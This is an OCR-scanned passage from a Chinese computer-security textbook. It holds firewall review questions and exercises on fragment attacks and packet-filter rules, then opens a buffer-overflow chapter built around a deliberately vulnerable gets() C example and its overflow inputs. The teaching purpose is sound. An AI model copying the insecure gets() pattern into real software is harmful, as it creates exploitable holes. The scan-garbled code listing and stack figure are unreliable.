检查 建立 和 拆除 的 方法 

验证 PNG 和 RSTP 协议 ， 丢弃 所 有 其 他 的 数据 包 
辅助 端口 的 监视 


过 滤 SNMP 版 本 1、2c 的 网 络 流量 
过 滤 读 、 写 和 通知 消息 

过 滤 OIDS 

过 滤 PDU (协议 数据 单元 ) 


Sidewinder G2 v6.x "P itm A HJ Type Enforcement 技 
术 严 格 限制 了 Secure Computing 对 OpenSSH 守护 进 
程 代 码 的 版 本 修改 能 力 


受 Type Enforcement 技术 保护 的 Sendmail 结构 分 割 
出 于 控制 目的 的 Sendmail 自 定 义 

利用 Type Enforcement 技术 防止 缓冲 区 溢出 
Sendmail 检查 SMTP 协议 的 异常 情况 


协议 确认 

反 垃 圾 邮件 过 滤器 

邮件 过 滤 ， 依 据 邮件 大 小 和 关键 词 
特征 码 反 病毒 

反 中 继 

MIME/ 反 病 毒 过 滤器 
防火 墙 反 病 毒 

通过 病毒 扫描 反 网 络 钓 鱼 


H & + Sidewinter G2 的 SmartFilter URL 过 滤 机 
制 ， 经 过 配置 能 够 过 滤 间 谍 软 件 的 URL， 防 止 恶意 
下 载 


DeMilitrarized Zone (DMZ， 非 军事 区 ) 
distributed firewalls (分 布 式 防火 墙 ) 
firewall (防火 墙 ) 
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host-based firewall (基于 主机 的 防火 墙 ) personal firewall (个 人 防火 墙 ) 

host-based IPS (基于 主机 的 IPS) proxy (代理 ) 

Intrusion Prevention System (IPS， 信 侵 防御 系统 ) stateful packet inspection firewall (状态 检测 防火 墙 ) 
IP address spoofing (IP 地 址 欺骗 ) tiny fragment attack (细小 分 段 攻 击 ) 

IP security (IPSec, IP 安全 ) Unified Threat Management (UTM， 统 一 威胁 管理 ) 
network-based IPS (基于 网 络 的 IPS) Virtual Private Network (VPN， 虚 拟 专用 网 ) 


packet filtering firewall ( 包 过 滤 防 火 墙 ) 


复习 题 


列 出 防火 墙 设计 的 三 个 目标 。 


9.2 列 出 防火 墙 控制 访问 及 执行 安全 策略 的 4 种 技术 。 

9.3 ”典型 的 包 过 滤 防 火 墙 使 用 了 什么 信息 ? 

9.4 ” 包 过 滤 防 火 墙 有 哪些 弱点 ? 

9.5 包 过 滤 防 火 墙 和 状态 检测 防火 墙 的 区 别 是 什么 ? 

9.6 ”什么 是 应 用 级 网 关 ? 

9.7 什么 是 电路 级 网 关 ? 

9.8 图 9-1 中 不 同 的 防火 墙 的 区 别 是 什么 ? 

9.9 ”堡垒 主机 的 一 般 特征 是 什么 ? 

9.10 ”为 什么 布置 基于 主机 的 防火 墙 很 有 用 ? 

9.11 什么 是 DMZ 网 络 ? 在 这 样 的 网 络 中 你 希望 看 到 怎样 的 系统 ? 

9.12 ”内 部 防火 墙 和 外 部 防火 墙 的 区 别 是 什么 ? 

9.13 IPS 是 如 何 区 别 于 防火 墙 的 ? 

9.14 IPS 可 以 部 署 在 哪些 不 同 的 位 置 ? 

9.15 IPS 是 如 何 阻止 恶意 活动 的 ? 

9.16 UTM 系统 是 如 何 区 别 于 防火 墙 的 ? 

习题 

9.1 就 像 在 9.3 节 中 提 到 的 那样 ， 一 个 阻止 细小 分 段 攻击 的 方法 是 在 卫 包 的 第 一 个 段 中 加 入 传输 头 的 最 
小 强制 长 度 。 如 果 第 一 个 分 段 被 拒绝 了 ， 那 么 所 有 后 继 的 分 段 都 会 被 拒绝 。 然 而 ,根据 全 包 的 性 
质 ， 这 些 分 段 可 能 不 会 按 顺 序 到 达 。 因 此 ， 某 个 中 间 的 分 段 可 能 在 第 一 个 分 段 被 拒绝 前 就 通过 了 过 
滤器 。 那 么 ， 怎 么 处 理 这 种 情况 呢 ? 

92 在 一 个 IPv4 包 中 ， 第 一 个 分 段 中 净 荷 的 长 度 (用 八 位 的 字 节 表示 ) 等 于 总 长 度 Total Length) 
(4 x IHL)。 如 果 这 个 值 小 于 需要 的 最 小 值 (在 TCP 中 是 8 字 节 )， 则 这 个 分 段 和 整个 包 都 被 拒绝 。 
如 果 仅 使 用 分 段 偏 移 (Fragment Offset) 域 ， 请 提出 一 种 可 选 的 方法 来 达到 相同 的 效果 。 

9.3 RFC 791 (IPv4 协议 规范 ) 描述 了 一 个 重组 算法 ， 此 算法 会 导致 新 分 段 覆 盖 掉 之 前 接收 到 的 分 段 的 
任意 交 秋 部分。 攻击 者 可 以 利用 给 定 的 这 个 重组 算法 构造 一 系列 包 ， 其 中 最 低 的 ( 零 偏 移 ) 分 段 包 
含 无 害 的 数据 (因此 该 分 段 能 够 通过 包 过 滤器 )， 接 下 来 某 个 非 零 偏 移 的 包 会 与 TCP 头 信息 (例如 
A Ayam A) 交 倒 并 将 其 修改 。 由 于 第 二 个 包 不 是 零 分 段 偏 移 的 ， 因 此 它 可 以 通过 大 多 数 过 滤器 。 请 
设计 一 个 可 以 抵抗 这 种 攻击 的 包 过 滤 方 法 。 

9.4 表 9-5 显示 了 对 于 一 个 IP 地 址 从 192.168.1.0 到 192.168.1.254 的 虚拟 网 络 的 包 过 滤 防 火 墙 规 则 集 的 


一 个 样本 。 请 描述 一 下 每 条 规则 的 作用 。 
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表 9-5 ”样本 包 过 滤 防 火 墙 规则 集 


a 


9.5 SMTP (简单 邮件 传递 协议 ) 是 一 个 通过 TCP 协议 在 主机 之 间 传 递 邮件 的 标准 协议 。 在 用 户 代理 端 
和 服务 程序 之 间 建 立 一 个 TCP 连接 。 服 务 程序 监视 25 TCP 端口 来 查看 是 否 有 连接 请 求 。 连 接 的 用 [315 
户 端 部 分 的 TCP 端口 号 在 1023 以 上 。 假设 你 要 做 一 个 包 过 滤 策 略 集 来 允许 进出 的 SMTP 网 络 流 
量 ， 并 且 生 成 了 如 下 的 规则 集 : 


A 外 部 内 部 TCP 允许 
出 内 部 外 部 TCP 允许 
允许 


任意 任意 任意 任意 拒绝 


a. 摘 述 这 些 规则 的 作用 。 

b. 假设 你 的 主机 在 这 个 例子 中 的 IP 地址 是 172.16.1.1。 某 个 人 想 从 IP 地 址 为 192.168.3.4 的 远程 主 
机 发 邮件 给 你 。 如 果 成 功 了 ， 则 将 会 在 远程 主机 和 你 机 器 上 的 SMTP 服务 之 间 建 立 一 个 由 SMTP 
命令 和 邮件 组 成 的 SMTP 会 话 。 另 外 ， 假 设 你 主机 上 的 一 个 用 户 想 发 送 电子 邮件 到 远程 主机 上 的 
SMTP 服务 器 上 。 则 这 一 过 程 会 产生 如 下 的 四 个 典型 的 包 : 


+ 192.168.1.0 


7 


这 S| 


mic da | 
Hic 
= 
ae es 
: 
Hi | 2 
= 
: 
Q 
9 
è 
= 
N 
Ww 


192.168.3.4 172.16.1.1 


出 172.16.1.1 192.168.3.4 
192.168.3.4 172.16.1.1 


指出 哪些 包 将 会 被 允许 或 者 阻止 ， 并 且 指 出 每 种 情况 使 用 了 哪 条 规则 。 
c. 假设 外 部 的 某 个 人 试图 从 IP 地 址 为 10.1.2.3 的 远程 主机 上 通过 该 主机 上 的 5150 端口 建立 一 个 到 
本 地 主机 ( 172.16.3.4 ) 上 运行 的 Web 代理 服务 器 (端口 为 8080 ) 的 连接 ,来 发 动 一 个 远程 攻击 。 


典型 的 包 显 示 如 下 : 





EE 172.16.1.1 192.168.3.4 


10.1.2.3 172.16.3.4 
172.16.3.4 10.1.2.3 
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这 个 攻击 会 成 功 吗 ? 给 出 详细 说 明 。 
96 ”为 了 提供 更 好 的 保护 ， 对 前 面 几 个 问题 中 的 策略 集 进行 了 如 下 的 修改 : 


a. 描述 这 些 修改 。 
b. 将 这 个 新 的 规则 集 应 用 到 上 一 题 的 6 个 包 中 。 指 明 哪些 包 会 被 允许 或 者 被 拒绝 ， 并 指明 每 种 情况 
使 用 了 哪 条 规则 。 
9.7 一 个 攻击 者 试图 用 他 /她 自己 机 器 上 的 25 号 端口 建立 一 个 到 你 的 Web 代理 服务 器 的 连接 。 
a. 会 产生 如 下 的 数据 包 : 


wga] ww 









源 
massa | 10423 5080 


解释 为 什么 使 用 上 一 题 的 规则 集 时 该 次 攻击 会 成 功 。 
b. 当初 始 化 一 个 TCP 连接 的 时 候 ，TCP 消息 头 的 ACK 位 没有 被 设 定 。 但 是 接 下 来 ， 所 有 通过 该 连 
接 的 TCP 包 的 消息 头 都 设置 了 ACK 位 。 根 据 这 个 提示 ， 修 改 前 面 上 一 题 的 规则 集 ， 使 它 能 够 阻 
止 刚才 所 描述 的 攻击 。 
9.8 在 9.6 节 中 介绍 了 5 种 被 NIPS 设备 用 来 检测 攻击 的 方法 。 写 出 每 个 方法 的 优点 和 缺点 。 
9.9 ”一 个 通用 的 管理 要 求 是 “所 有 外 部 的 Web 网 络 流量 必须 经 过 机 构 的 Web 代理 ”。 然 而 ， 这 个 需求 真 
是 “说 起 来 容易 做 起 来 难 ” 啊 ! 讨论 一 下 ， 要 支持 这 样 的 需求 所 面临 的 问题 ， 并 提出 可 能 的 解决 方 
法 及 其 局 限 性 。 特 别 地 ， 在 Web 浏览 器 和 服务 器 要 使 用 大 量 的 端口 和 很 多 的 协议 的 情况 下 ， 考 虑 解 
决 如 何 精确 地 判定 哪些 是 “Web 网 络 流量 ”并 且 如 何 监 视 这 些 网 络 流量 的 问题 。 
9.10 考虑 “ 盗 取 /破坏 系统 所 有 权 或 者 关键 数据 文件 中 的 机 密 信息 ”的 威胁 。 这 种 破坏 可 能 发 生 的 一 种 
方式 是 偶然 或 者 有 意 地 给 机 构 外 面 的 用 户 发 送 电子 邮件 。 对 于 这 种 情况 的 一 种 解决 方法 是 要 求 所 
有 外 出 的 电子 邮件 都 具有 一 个 关于 信件 内 容 的 敏感 性 标签 (或 者 分 类 )， 并 且 要 求 所 有 向 外 发 出 的 
邮件 都 要 具有 最 小 的 等 级 敏感 标签 。 讨 论 一 下 ， 这样 的 方法 如 何在 防火 墙 上 实现 ， 要 实现 这 个 方 
法 ， 防 火 墙 需要 哪些 组 成 部 分 和 体系 结构 。 
要 求 使 用 像 图 9-2 那样 的 防火 墙 来 实现 如 下 的 “ 非 正式 防火 墙 策略 ”的 细节 : 
1. 电子 邮件 可 能 使 用 SMTP 协议 从 防火 墙 内 外 两 端 发 送 ， 但 是 它 必 须 经 过 DMZ 邮件 网 关 的 转发 。 
DMZ 邮件 网 关 提 供 了 头 处理 和 内 容 过 滤 功 能 。 外 来 的 电子 邮件 必须 被 转 到 DMZ 邮件 服务 器 上 。 
2. 内 部 的 用 户 使 用 POP3 或 者 POP3S 协议 并 进行 目 我 认证 ， 就 能 够 从 DMZ 邮件 网 关上 获取 他 们 自 
己 的 邮件 。 
3. 外 部 的 用 户 只 能 使 用 安全 的 POP 协议 并 进行 自我 认证 才能 够 从 DMZ 邮件 网 关上 获取 自己 的 
邮件 。 
4. 内 部 用 户 通 过 防火 墙 的 Web 请 求 (包括 安全 的 和 非 安全 的 ) 都 会 被 允许 ,但 是 必须 通过 DMZ 
Web 代理 转发 。DMZ Web 代理 能 够 提供 内 容 过 滤 (注意 这 种 过 滤 不 能 处 理 安全 的 请 求 )。 并 且 用 
户 必 须 跟 这 个 代理 进行 认证 ， 以 便于 记录 。 





9,1 


— 


9.12 


9.13 


9.14 
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5. 从 Internet 上 到 DMZ Web 服务 器 上 的 任何 Web 请 求 (包括 安全 和 非 安全 的 ) 都 会 被 允许 。 

6. 允许 内 部 用 户 请 求 DNS 查询 ， 但 需要 通过 DMZ DNS 服务 器 。 由 DMZ DNS 服务 器 到 Internet 
上 去 查询 。 

7. 外 部 的 DNS 查询 由 DMZ DNS 服务 器 提供 。 

8. 对 DMZ 服务 器 的 管理 和 信息 更 新 只 能 通过 安全 的 shell 连接 ， 由 相应 的 经 过 认证 的 内 部 用 户 来 
完成 (可 以 在 每 个 系统 上 设置 合适 的 不 同 的 用 户 集 )。 

9. SNMP 管理 请 求 由 内 部 的 管理 主机 到 防火 墙 是 被 允许 的 ， 而 且 防 火 墙 也 允许 发 送 管 理 陷 门 
(management trap)( 例 如 ， 发 生 某 些 事情 的 通知 ) 到 管理 主机 上 。 

设计 合适 的 可 以 在 “外 部 防火 墙 ” 和 “内 部 防火 墙 ” 上 实现 的 包 过 滤 规 则 集 〈 类 似 于 表 9-1 显 

示 的 那样 )， 以 满足 上 述 提 到 的 策略 需求 。 

在 内 部 协作 网 络 中 ， 我 们 有 一 个 仅 用 于 测试 的 内 部 Web 服务 器 ， 地 址 是 5.6.7.8。 包 过 滤器 位 于 内 

网 和 Internet 其 他 部 分 之 间 的 遏制 点 上 。 该 包 过 滤器 能 够 阻止 所 有 外 部 主机 向 那 台 内 部 Web 服务 

器 发 起 的 TCP 连接 请 求 吗 ? 如 果 能 ， 请 设计 合适 的 包 过 滤 规 则 来 提供 这 样 的 功能 URR 9-1 那样 ); 

如 果 不 能 ， 解 释 为 何不 能 。 

在 防御 服务 器 、 台 式 机 、 笔 记 本 上 ， 为 了 对 抗 网 络 威胁 ， 有 如 下 几 种 部 署 防火 墙 的 场景 ， 请 分 别 

解释 每 种 方法 的 优点 和 不 足 : 

a. 防火 墙 放 置 在 网 络 外围 。 

b. 防火 墙 放置 在 每 台 主 机 端 。 

c. 防火 墙 放 置 在 网 络 外 围 和 每 台 主 机 端 。 

考虑 第 8 章 给 出 的 用 于 检测 SYN-FIN 攻击 的 Snort 规则 集 的 例子 。 假 定 这 个 规则 用 在 Snort Inline 

IPS 上 ， 你 将 如 何 修改 规则 来 阻止 这 种 包 进 入 家 庭 网 络 ? 
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学 习 目 标 

学 习 完 本 章 之 后 ， 你 应 该 能 够 : 

定义 什么 是 缓冲 区 溢出 ， 列 出 可 能 产生 的 后 果 ; 

详细 描述 栈 缓冲 区 溢出 是 如 何 产生 的 ; 

定义 shellcode， 描 述 在 缓冲 区 溢出 攻击 中 它 所 起 的 作用 ; 
列 出 针对 缓冲 区 溢出 攻击 的 各 种 防范 措施 ; 

列 出 各 种 其 他 类 型 的 缓冲 区 溢出 攻击 。 





本 章 我 们 重点 讨论 缓冲 区 溢出 攻击 。 这 种 类 型 的 攻击 是 我 们 所 见 到 的 最 普遍 的 攻击 方式 之 
一 ， 它 往往 是 由 于 在 应 用 程序 开发 中 不 细心 的 编程 而 导致 的 。 一 些 组 织 ， 如 CERT 或 SANS, 
公布 的 漏洞 咨询 列表 中 显示 了 大 量 的 缓冲 区 溢出 或 者 堆 溢 出 应 用 ， 包 括 许 多 严重 的 、 可 被 远程 
攻击 利用 的 漏洞 。 类 似 地 ,在 CWE/SANS 公布 的 25 种 最 危险 的 软件 错误 名 单 和 风险 最 大 的 资 
源 管理 类 别 中 ， 就 有 数 项 是 属于 缓冲 区 溢出 的 变种 。 它 们 不 仅 会 导致 攻击 者 对 操作 系统 和 普通 
应 用 程序 的 漏洞 的 利用 ， 且 至 今 仍然 是 正在 被 广泛 使 用 的 漏洞 攻击 工具 包 [VEEN12] 中 大 多 数 
攻击 方法 的 组 成 部 分 。 缓 冲 区 洲 出 类 型 的 攻击 ， 自 从 1988 年 被 Morris 蠕虫 广泛 使 用 以 来 ， 人 
们 已 经 对 其 有 所 了 解 ， 而 且 阻 止 它 发 生 的 技术 也 被 人 们 所 熟知 并 被 记载 在 文档 中 。 表 10-1 给 
出 了 缓冲 区 溢出 攻击 发 展 历 史上 一 些 非常 受 人 关注 的 事件 。 不 幸 的 是 ， 无 论 是 由 于 满 是 bug 但 
又 一 直 以 来 服务 于 广泛 普及 的 操作 系统 和 应 用 程序 的 遗留 代码 ， 还 是 由 于 许多 系统 没有 及 时 地 
升级 和 打 补 丁 ， 又 或 是 拜 前 赴 后 继 的 程序 员 们 一 如 既往 的 马虎 的 编程 习惯 所 赐 ， 缓 冲 区 溢出 至 
今 仍然 是 安全 从 业 人 员 的 一 大 主要 顾虑 。 这 一 章 我 们 着 重 讨论 ， 绥 冲 区 溢出 是 如 何 发 生 的 ， 以 
及 使 用 什么 方法 能 够 阻止 或 者 检测 它 的 发 生 等 问题 。 


表 10-1 缓冲 区 溢出 攻击 简 史 
1988 Morris Internet 蠕虫 在 “fingerd” 中 使 用 一 种 缓冲 区 溢出 作为 其 攻击 机 制 之 一 
1995 一 个 缓冲 区 溢出 漏洞 在 NCSA httpd 1.3 上 被 发 现 ，Thomas Lopatic 将 其 公布 在 Bugtraq 邮件 列表 中 


Aleph One 在 《 Phrac ) 48% E42 SAA “ Smashing the Stack for Fun and Profit” 的 文章 ， 其 中 
一 步 一 步 地 给 出 利用 基于 栈 缓 冲 区 溢出 漏洞 的 攻击 方法 


2001 Code Red 蠕虫 利用 了 微软 IIS 5.0 的 一 个 缓冲 区 溢出 漏洞 
2003 Slammer 蠕虫 利用 了 微软 SQL Server 2000 的 一 个 缓冲 区 溢出 漏洞 


Sasser 蠕虫 病毒 利用 了 微软 Windows 2000/XP Local Security Authority Subsystem Service ( LSASS) 
的 一 个 缓冲 区 溢出 漏洞 


1996 


2004 


我 们 首先 介绍 缓冲 区 溢出 的 基本 知识 ， 然 后 给 出 典型 的 栈 缓冲 区 溢出 的 细节 ， 包 括 讨论 函 
数 在 栈 里 是 如 何 存储 它 的 局 部 变量 的 ， 以 及 试图 在 栈 里 存储 更 多 数据 时 ， 当 数据 所 占 的 地 址 比 
栈 的 可 用 地 址 空间 多 时 所 产生 的 后 果 。 接 着 ， 我 们 对 shellcode 的 目的 和 设计 进行 概括 的 分 
析 ， 其 中 shellcode 是 攻击 者 注入 的 定制 代码 ， 由 于 缓冲 区 溢出 ， 它 会 获得 系统 的 控制 权 。 
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然后 ， 我 们 考虑 缓冲 区 溢出 攻击 的 防御 方法 。 首 先 从 防止 发 生 缓冲 区 溢出 最 明显 的 方法 开 
始 ， 那 就 是 避免 编写 容易 导致 缓冲 区 溢出 漏洞 的 代码 。 然 而 ， 对 于 给 定 庞 大 且 存 在 很 多 bug 的 
代码 体 来 说 ， 我 们 还 需要 考虑 能 够 检测 并 阻止 缓冲 区 溢出 攻击 的 硬件 和 软件 机 制 ， 包 括 可 执行 
的 地 址 空间 保护 的 机 制 、 检 测 栈 修改 的 技术 、 随 机 化 地 址 空间 布局 从 而 成 功 干 扰 这 些 攻 击 执行 
的 方法 。 

最 后 ， 我 们 简要 地 分 析 一 些 其 他 的 溢出 技术 ， 包 括 返回 导 回 的 系统 调用 (return to system 
call)、 堆 洲 出 及 其 相应 的 防御 方法 。 


10.1 栈 溢出 


10.1.1 缓冲 区 溢出 的 基本 知识 


缓冲 区 溢出 (buffer overflow 或 buffer overrun) 在 NIST 的 信息 安全 关键 术语 词汇 表 (NIST 
Glossary of Key Information Security Terms) 中 是 这 样 定 义 的 : 


缓冲 区 溢出 是 指 接口 的 一 种 状况 ， 此 时 大 量 的 输入 被 放置 到 缓冲 区 或 者 数据 存储 区 ， 超 过 


了 其 所 分 配 的 存储 能 力 ， 覆 盖 了 其 他 信息 。 攻 击 者 利用 这 样 的 状况 破坏 系统 或 者 插入 特别 
编制 的 代码 ， 以 获得 系统 的 控制 权 。 





缓冲 区 溢出 是 作为 编程 错误 的 结果 而 发 生 的 ， 此 时 ， 一 个 进程 试图 存储 超出 缓冲 区 存储 
容量 (固定 长 度 ) 的 数据 ， 从 而 导致 相 邻 的 内 存 区 域 被 覆盖 。 这 些 内 存 区 域 可 能 保存 着 其 他 程 
序 的 变量 或 者 参数 ， 也 可 能 保存 着 程序 控制 流 数 据 ， 例 如 返回 地 址 和 指向 前 一 个 栈 帧 的 指针 。 
缓冲 区 可 能 被 设置 在 进程 的 栈 区 、 堆 区 ,或 者 数据 区 。 发 生 缓冲 区 洲 出 错误 的 后 果 包 括 : 程 
序 使 用 的 数据 受到 破坏 、 在 程序 中 发 生意 外 的 控制 权 转 移 、 可 能 的 内 存 非法 访问 ， 以 及 很 可 
能 最 终 导 致 程序 终止 。 当 缓冲 区 溢出 被 用 于 蓄意 攻击 系统 时 ， 系 统 的 控制 权 可 能 会 被 转移 到 
攻击 者 选择 的 代码 ， 从 而 导致 被 攻击 进程 的 特权 被 用 于 执行 攻击 者 任意 想 要 执行 的 代码 。 

为 了 说 明 缓 冲 区 溢出 的 基本 操作 ， 我 们 考虑 图 10-1a 中 给 出 的 一 个 C 语言 主 函 数 。 在 这 个 
主 函 数 中 ， 包 含 3 个 变量 (valid, strl 和 str2) S98， 它们 的 值 通常 被 存储 在 相 邻 的 存储 单元 中 。 
存储 的 次 序 和 位 置 是 由 变量 类 型 (局 部 的 或 者 全 局 的 )、 所 用 的 编程 语言 和 编译 器 ， 以 及 目标 
机 器 的 结构 决定 的 。 然 而 ， 由 于 我 们 在 这 个 实例 中 想 要 看 到 缓冲 区 发 生 溢出 ， 所 以 我 们 假设 这 
几 个 变量 从 内 存 高 端 到 低 端 连续 存储 ， 如 图 10-2 ffm. RE C 语 言 函数 中 的 局 部 变量 在 通 
用 的 处 理 器 上 典型 的 存储 方式 ， 如 Intel Pentium 系列 处 理 器 。 这 个 代码 段 的 目的 是 调用 函数 
next tag (strl )， 把 一 些 希 望 的 标记 值 (tag value) 复制 给 str1。 假 设 这 个 标记 值 是 字符 串 
START。 接 着 程序 调用 C 的 库 函 数 gets() 从 标准 输入 中 读 入 下 一 行 字符 串 ， 并 与 读 和 人 的 希望 的 
标记 值 进行 比较 。 如 果 下 一 行 读 入 的 字符 串 与 字符 串 START 匹配 ， 那 么 这 次 比较 就 成 功 了 ， 
变量 valid 被 设置 为 TRUE ©, REER 10-1b @ 中 显示 的 三 次 运行 程序 的 第 一 次 运行 的 情况 。 
任何 其 他 的 输入 标记 都 会 使 valid 的 值 变 为 FALSE。 这 样 的 一 个 代码 段 常 被 用 于 解析 一 些 结构 


日 “在 这 个 例题 中 ,标志 (flag) 变量 按照 整 型 存储 ， 不 是 布尔 型 的 ， 这 是 因为 它 是 标准 的 C 语言 的 风格 ， 也 可 以 避 
免 在 存储 时 字 对 齐 的 问题 。 这 个 缓冲 区 故意 设置 得 很 小 ， 以 便 能 够 突出 说 明 我 们 正在 讨论 的 缓冲 区 溢出 的 问题 。 

四 ”在 这 个 图 以 及 相关 的 图 中 ， 地 址 值 和 数据 值 都 是 用 十 六 进 制 表示 的 。 在 适当 的 时 候 数 据 值 也 可 用 其 对 应 的 
ASCII 码 来 表示 。 

© 在 C 语 言 中 ,逻辑 值 FALSE 和 TRUE 就 是 分 别 取 值 为 0 和 1 (或 者 事实 上 是 任 一 非 零 值 ) 的 两 个 简单 的 整 
数 。 经 常 使 用 符号 定义 ， 用 符号 的 名 字 代 替 它 们 原本 定义 的 值 ， 就 像 我 们 在 这 个 程序 中 所 做 的 一 样 。 

图 “本章 中 ， 本 例 和 其 他 的 所 有 例题 都 是 在 Pentium 处 理 器 上 运行 的 Knoppix Linux 系统 中 产生 的 ， 其 中 使 用 的 
编译 器 为 GNU GCC， 程 序 调试 器 为 GDB。 
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化 网 络 协 议 间 的 相互 作用 或 者 格式 化 的 文本 文件 。 


pant mainline argc, gear *argv[]) { 


i Raab Geel, str2, ‘By ee py | 
= valid = TRUE; 
_ printf ("bufferl: strl(%s), str2(%s), valid(#d)\n", strl, str2, valid); 





a) FEAR DK ee HAY C 语言 代码 


$ i eps =g =o: UES SEL Paffoni; G 


å 





b) ) EERE 运行 示例 
图 10-1 基本 的 缓冲 区 溢出 示例 


gets (str2) gets (str2) 
内 存 地 址 调用 之 前 调用 之 后 包含 的 值 


> ening 34fcffbf argv 
bffffbf4 eo 

01000000 01000000 arge 
bffffbf0 at 

in i 返回 地 址 
bffffbec 

O8fcffbf O8fcffbf 前 一 栈 帧 的 
bffffbe8 基地 址 指针 

00000000 01000000 | 

De 0640140 
bffffbe0 e 2 

== 4e505554 strl [4-7] 

53544152 42414449 stri[0-3] 

00850408 4e505554 str2 [4-7] 

056154 9 str2[0-3] 
bffffbd0 305615 2 p ge 





图 10-2 基本 的 缓冲 区 溢出 的 栈 值 


这 段 代 码 是 存在 问题 的 ， 这 是 因为 传统 的 C 语言 的 库 函 数 gets() 对 数据 复制 的 数量 没有 包 
含 任何 检查 。 该 函数 从 程序 的 标准 输入 中 读 取 下 一 行 的 文本 直到 第 一 个 换行 符 9 (newline) 出 现 


© 换行 newline (NL) 或 linefeed (LF) 符 是 UNIX 系统 一行 终止 的 标准 结束 方式 。 对 于 C 语言 来 说 ， 它 用 
ASCII 码 值 为 0x0a 的 字符 表示 一 行 终止 。 
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为 止 ， 并 将 这 些 文本 在 末尾 加 上 一 个 C 语言 字符 串 9 使 用 的 NULL 之 后 ， 复 制 到 提供 的 缓冲 区 
内 。 如 果 在 输入 行 出 现 的 字符 多 于 7 个 ， 那 么 在 读 入 的 时 候 (连同 结束 字符 NULL) 它们 将 需 
要 比 str2 的 有 效 缓冲 区 更 多 的 地 址 空间 ， 结 果 造 成 多 余 的 字符 覆盖 了 相 邻 变量 的 值 ， 此 例 中 相 
邻 的 变量 就 是 str1。 例 如 ， 如 果 输 入 的 字符 串 是 EVILINPUTVALUE， 那 么 strl 会 被 改写 为 
TVALUE， 而 str2 使 用 的 不 仅 是 分 配给 它 的 8 个 字符 ， 还 包括 strl 的 7 个 字符 ,这 可 以 从 图 
10-1b 中 第 二 次 运行 的 结果 中 看 到 。 滋 出 导致 变量 strl 受到 破坏 ， 它 使 用 的 值 已 经 不 是 直接 保 
存 的 输入 内 容 ， 而 是 被 改写 以 后 的 值 。 因 为 这 两 个 字符 串 不 相同 ， 所 以 变量 valid 取 值 为 
FALSE。 更 进一步 ， 如 果 输 入 16 个 或 者 更 多 的 字符 ， 那 么 将 会 覆盖 另外 相 邻 的 内 存 区 域 。 

上 面 的 例子 说 明了 缓冲 区 溢出 的 基本 行为 。 简 单 地 讲 ， 就 是 将 任何 未 做 检查 的 数据 
复制 到 一 个 缓冲 区 能 够 导致 相 邻 的 内 存 区 域 受 到 破坏 。 这 个 区 域 可 能 是 其 他 变量 的 ， 或 
者 像 我 们 下 面 将 看 到 的 那样 ， 可 能 是 程序 的 控制 地 址 和 数据 。 即 使 是 这 个 简单 的 例子 我 
们 也 能 进一步 来 讨论 。 攻 击 者 一 旦 知道 处 理 该 程序 的 代码 结构 ， 他 就 能 够 安排 改写 值 写 
入 str1， 使 其 与 str2 中 的 值 相 同 ， 从 而 使 得 比较 能 够 成 功 。 例 如 ， 输 入行 可 以 是 字符 串 
BADINPUTBADINPUT， 这 就 导致 了 比较 成 功 ， 如 图 10-1b 中 程序 实例 的 第 三 次 运行 中 显示 
的 结果 以 及 图 10-2 中 对 函数 gets() 调用 前 后 局 部 变量 值 的 说 明 所 示 。 我 们 也 注意 到 ， 在 输入 
字符 串 时 ，NULL 已 经 被 写 人 到 紧 随 str] 末尾 的 内 存 区 域 中 。 这 也 就 是 说 程序 的 控制 流 将 继 
续 ， 就 好 像 已 经 发 现 所 希望 的 字符 串 结束 标记 一 样 。 但 事实 上 ， 读 人 的 标记 是 一 些 完全 不 同 
的 内 容 。 这 就 造成 程序 行为 不 是 我 们 想 要 的 行为 ， 其 严重 程度 主要 依赖 于 受到 攻击 的 程序 的 
内 在 逻辑 。 如 果 替 换 的 不 是 缓冲 区 中 的 一 个 标记 值 ， 而 是 一 个 希望 提供 的 、 用 于 访问 特权 特 
征 的 口令 ， 那 么 危险 就 可 能 发 生 。 如 果 是 这 样 ， 缓 冲 区 洲 出 就 为 攻击 者 提供 了 在 不 知道 正确 
口令 的 情况 下 能 够 访问 这 些 特征 的 方法 。 

要 想 利 用 任何 一 种 类 型 的 缓冲 区 溢出 ， 例 如 已 经 举例 说 明 的 那些 程序 ， 攻 击 者 需要 : 

1. 在 一 些 程 序 中 识别 缓冲 区 溢出 漏洞 ， 这 些 漏洞 在 攻击 者 的 控制 下 使 用 外 部 的 数据 资源 能 
够 被 触发 。 

2. 要 理解 缓冲 区 是 如 何 存储 在 进程 的 内 存 中 的 ， 以 及 因此 破坏 相 邻 的 内 存 区 域 和 改变 程序 
的 执行 流 的 可 能 性 。 

识别 有 漏洞 的 程序 可 以 通过 检查 源 代 码 ， 在 程序 处 理 过 长 的 输入 时 跟踪 程序 的 执行 ， 或 者 
使 用 一 些 工 具 ， 例 如 fuzzing 技术 ， 该 技术 我 们 将 在 11.2 节 中 讨论 ， 它 可 以 自动 识别 可 能 存在 
漏洞 的 程序 。 利 用 缓冲 区 溢出 所 造成 的 对 内 存 的 破坏 ,攻击 者 可 以 随心 所 欲 地 做 一 些 事情 ,但 
这 依赖 于 所 改写 的 值 的 情况 。 在 接 下 来 的 几 节 中 ， 我 们 将 探讨 男 外 的 一 些 情况 。 

在 进一步 讨论 缓冲 区 溢出 问题 以 前 ， 我们 有 必要 考虑 导致 缓冲 区 溢出 发 生 的 情况 是 如 何 产 
生 的 ?为 什么 程序 未 必 能 避免 此 类 错误 的 发 生 ? 为 了 理解 这 些 问题 ， 我 们 首先 简 述 一 下 程序 语 
言 的 发 展 历史 和 计算 机 系统 的 基本 操作 。 在 计算 机 的 底层 ， 通 过 计算 机 处 理 器 运行 机 器 指令 来 
完成 操作 的 所 有 数据 ， 都 存储 在 处 理 器 的 寄存 器 或 者 内 存 中 。 数 据 仅 仅 是 字 节 数 组 ， 对 它们 的 
解释 完全 由 访问 它们 的 指令 的 功能 来 决定 。 一 些 指 令 将 这 些 字 节 当 作 整 数值 来 处 理 ， 其 他 的 则 
作为 数据 或 者 指令 的 地 址 ， 以 及 字符 数组 。 在 寄存 器 或 内 存 中 没有 什么 是 固有 的 东西 ， 这 就 能 
够 说 明 对 某 些 内 存 区 域 可 以 有 其 他 的 解释 。 因 此 ， 汇 编 语言 程序 员 有 义务 保证 对 任何 保存 的 数 
据 值 设置 正确 的 解释 。 汇 编 语言 (以 及 机 器 语言) 程序 的 使 用 ， 使 得 程序 员 对 计算 机 系统 资源 
具有 了 最 大 的 访问 权限 ， 但 是 程序 员 在 编码 过 程 中 付出 了 最 高 的 代价 并 承担 了 更 多 的 责任 。 


